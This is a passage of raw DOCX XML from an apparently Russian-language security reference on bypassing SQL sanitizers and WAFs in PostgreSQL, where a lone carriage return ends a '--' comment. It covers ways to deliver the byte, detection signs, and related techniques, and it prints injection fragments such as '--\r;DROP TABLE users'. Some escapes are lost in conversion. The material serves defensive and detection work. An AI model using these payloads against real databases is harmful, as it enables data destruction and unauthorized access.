        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/JSON layer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обычно нормализует line-endings к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Сырой одиночный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> редкий, но при byte-уровневой передаче (multipart binary, custom JSON `"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173D37D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>"`) проходит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2293007B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bytes-level sanitizer-ы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на ModSecurity / Imperva иногда обрабатывают только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0x0A) как line-terminator, игнорируя </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (0x0D).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8620F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему PostgreSQL принимает результат как валидный SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AB52A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-парсер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: см. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src/backend/parser/scan.l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, scan-state </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xqs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (single-line-comment) — закрывается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[\n\r]</w:t>
      </w:r>
      <w:r>
        <w:t>. Любой из двух байтов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E05F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Спецификация SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: SQL:2008 §5.2 определяет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;simple comment terminator&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как «implementation-defined newline character or sequence». PG имплементирует «any of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E87AAE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Стабильно</w:t>
      </w:r>
      <w:r>
        <w:t>: эта семантика с самой ранней версии PG (фактически — flex-уровень, не PG-специфичная фича).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B40F0C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сравнение с другими СУБД</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: MySQL обрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-комментарий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (документация: «to end of line»), MSSQL — на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (но не одиночный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>). Каждая СУБД имеет свою семантику line-terminator-а, и PG — самая «либеральная».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B222F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Требования к среде</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F33A64" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 7.x – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (все поддерживаемые).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6913C2B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии</w:t>
      </w:r>
      <w:r>
        <w:t>: PUBLIC. Целевая атака может требовать любые privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36214BF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый sanitizer на client-side / WAF / API-gateway</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не нормализующий одиночный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Если в pipeline есть нормализация к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или строгая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t>-only validation), Payload A не пройдёт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366BC44E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Способ передать одиночный `\r` в payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: URL-encoded </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%0D</w:t>
      </w:r>
      <w:r>
        <w:t>, JSON `"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F56B70E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>"`, raw bytes в multipart upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB9824F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C8CB99" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Как выглядит легитимное использование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19375738" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-line SQL в скриптах migration / seed-данных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между statement-ами. Не атака; стандартный код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B19C061" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CRLF в text-полях</w:t>
      </w:r>
      <w:r>
        <w:t>: legitimate user-data (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>address: '123 Main St\nCity'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это не атака, потому что параметризация (если есть) пакует как text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F63C8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CR-only в legacy-Mac-text-полях</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: классические Mac OS (&lt; OS X) использовали одиночный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как line-terminator. Современные системы редко.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727DDC0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Атака отличается:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616F5E45" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Одиночный `\r` в `q`-параметре HTTP-запроса</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — крайне редок в legitimate-трафике. Маркер автоматизированного payload-генерации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088079FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`--&lt;short text&gt;\r&lt;UNION|DROP|GRANT&gt;...`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — структура «комментарий-затем-CR-затем-DDL/UNION» — почти всегда атака.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D4176E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   **HTTP/JSON pre-decode `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A93A5DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">** — explicit Unicode-escape для CR. Legitimate JSON-data редко содержит этот escape (обычно </w:t>
      </w:r>
      <w:r>
        <w:t>\n` достаточно).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4ECD07" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запись с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и переносом — обычно фиксированный legitimate-комментарий код, не из user-input. User-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>-комментарий — индикатор log-injection (см. также 3.12.3 для server-side leak через CRLF-в-identifier).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631C52CB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A11A00" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 7.x – 17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (все поддерживаемые).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6F4D30" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Managed</w:t>
      </w:r>
      <w:r>
        <w:t>: работает идентично.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF10672" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689145B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.0 (WAF категории 3.9)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — содержит правило </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r"--|/\*"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. 3.12.2 — про обход sanitizer-а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>после</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> прохода WAF (если WAF пропускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или WAF — это и есть sanitizer, который не учитывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\r</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C5287" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.1 (Nested block comments)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельный класс. Часто комбинируются: 3.12.1 для block-comment-обхода + 3.12.2 для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обхода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4766BEBD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.12.3 (Newline в идентификаторах)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — server-side counterpart. 3.12.2 — про client-input CR/LF в payload-тексте; 3.12.3 — про CR/LF, embedded в PG-объектное имя (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB02D41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 (Stacked queries)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--\r;DROP TABLE users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комбо с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после CR; в extended-protocol заблокировано на сервере.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C4F33A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.4 (E-strings hex)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>E'\r'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> встраивает CR в string-литерал; альтернатива для контекстов, где </w:t>
      </w:r>
      <w:r>
